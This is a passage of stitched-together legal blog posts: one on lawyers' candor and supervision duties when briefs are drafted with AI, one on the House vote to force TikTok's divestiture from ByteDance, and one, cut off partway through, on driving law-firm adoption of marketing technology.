It goes without saying that a lawyer has a responsibility to adhere to the duty of candor when making representations to the Court. As mentioned, violations of that duty have arisen from statements included in legal briefs produced using AI platforms. While many lawyers would immediately rebuff the notion that they would fail to double-check the accuracy of a brief's contents (even if generated using AI) before submitting it to the Court, this concept gets trickier when working on larger litigation teams. As a result, it is incumbent not only on those preparing the briefs to ensure that any information included in a submission created with the assistance of an AI platform is accurate, but also on the lawyers responsible for oversight of a litigation team to be diligent in understanding when and to what extent AI is being used to aid the work of their subordinates. Similar to confidentiality considerations, many courts' rules of professional conduct include rules related to senior lawyer responsibilities and oversight of subordinate lawyers. To appropriately abide by those rules, litigation team leaders should make it a point to discuss with their teams the appropriate use of AI at the outset of any matter, as well as to put in place any law firm, court, or client-specific safeguards or guidelines to avoid potential missteps.
Judicial Preferences
Finally, as the old saying goes: a good lawyer knows the law; a great lawyer knows the judge. Any savvy litigator knows that the first thing one should understand prior to litigating a case is whether the Court and the presiding Judge have put in place any standing orders or judicial preferences that may impact litigation strategy. As a result of the rise of AI use in litigation, many Courts across the country have responded by developing standing orders, local rules, or related guidelines concerning the appropriate use of AI. See, e.g., Standing Order Re: Artificial Intelligence ("AI") in Cases Assigned to Judge Baylson (E.D. Pa. June 6, 2023); Preliminary Guidelines on the Use of Artificial Intelligence by New Jersey Lawyers (N.J. Supreme Court, January 25, 2024). Litigators should follow suit and ensure they understand the full scope of how their Court, and more importantly, their assigned Judge, treats the issue of using AI to assist litigation strategy and the development of work product.
Yesterday, with broad bipartisan support, the U.S. House of Representatives voted overwhelmingly (352-65) to support the Protecting Americans from Foreign Adversary Controlled Applications Act, designed to begin the process of banning TikTok’s use in the United States. This is music to my ears. See a previous blog post on this subject.
The Act would penalize app stores and web hosting services that host TikTok while it is owned by Chinese-based ByteDance. However, if the app is divested from ByteDance, the Act will allow use of TikTok in the U.S.
National security experts have warned legislators and the public that downloading and using TikTok poses a national security threat. The threat arises because ByteDance is required by Chinese law to share users' data with the Chinese Communist government. When the app is downloaded, TikTok obtains access to users' microphones, cameras, and location services, essentially placing spyware on over 170 million Americans' every move (dance or not).
Lawmakers are concerned about the detailed sharing of Americans' data with one of the country's top adversaries and about the ability of TikTok's algorithms to influence the American people and launch disinformation campaigns against them. The Act will now make its way through the Senate, and if passed, President Biden has indicated that he will sign it. This is a big win for privacy and national security.
While it may (or may not) be shocking that 50% of marriages end in divorce, a more jarring statistic may be that 77% of lawyers have experienced a failed technology implementation. And while some may take a second or even third chance at marriage, you rarely get a second chance at a marketing technology implementation, especially at a law firm.
Today's legal industry is hyper-competitive, and firms are asking attorneys to learn new skills and adopt new technology like artificial intelligence, eMarketing, or experience management systems. So, lawyers should be eager to embrace any MarTech that could help them gain an advantage, right? Unfortunately, fewer than 40% of lawyers use a CRM, and only slightly more than a quarter of them use it for sales pipeline management.
When examining lawyers' love/hate relationship with their firm's marketing technology infrastructure, it is important to consider the lawyer's perspective on change management and technology adoption. By nature, lawyers are skeptical, hypercritical, risk-averse, and reluctant to change. These attributes are certainly beneficial for practicing law, but not so much for encouraging marketing technology adoption. This is why it can sometimes feel like you are herding cats, except these cats are extremely smart, have opposable thumbs, and argue for sport.
While lawyers and technology might not seem like a match made in heaven, you can follow these steps to ensure greater adoption and utilization of your marketing technology:
1. Needs Assessment
The beauty of technology is that it can do so many things; the problem with technology is… it can do so many things. For technology to succeed, it has to adequately satisfy the end users' needs. Because each firm has its own set of unique needs, technology selection should start with a needs assessment. Interviews should be conducted with key stakeholders to determine your organization's specific needs and requirements.
As a follow-up to the needs assessment, interview user groups such as attorneys, partners, and even their assistants to understand their needs and requirements as well as their day-to-day processes and problems. These groups each define value differently, meaning that each group will have its own unique needs or set of requirements. Making these users part of the process upfront will increase the likelihood they'll adopt the technology later on.
2. Communicate
Like any good love affair, a successful technology deployment requires extensive communication. Attorneys must be convinced that the technology will benefit not only the firm but also them individually. It can be helpful to take the time to craft a formal communication plan, starting with an announcement from firm leadership outlining the system's benefits. Realistic expectations should be set, not only for the system but also for user requirements.
Next, establish, document, and distribute any processes and procedures necessary to support the implementation. Most importantly, sharing is caring, so always communicate when goals have been reached or solicit feedback from the end users.
3. Resources
All good relationships require attention. Oftentimes, firms forget to account for the long-term costs associated with a technology deployment. For a successful technology deployment, firms must dedicate necessary resources including time, money, and people. It also takes the coordinated efforts of everyone in the firm, so be sure to invite everyone who may need to be involved, such as:
Technical support to assist with implementation and integrations
Training programs with outlined criteria for different user groups
Data stewards (internal or outsourced) to make sure data is clean, correct and complete
The marketing and business development departments that will be tasked with developing and executing a communication strategy
Firm leadership and key attorneys whose support can be used to drive adoption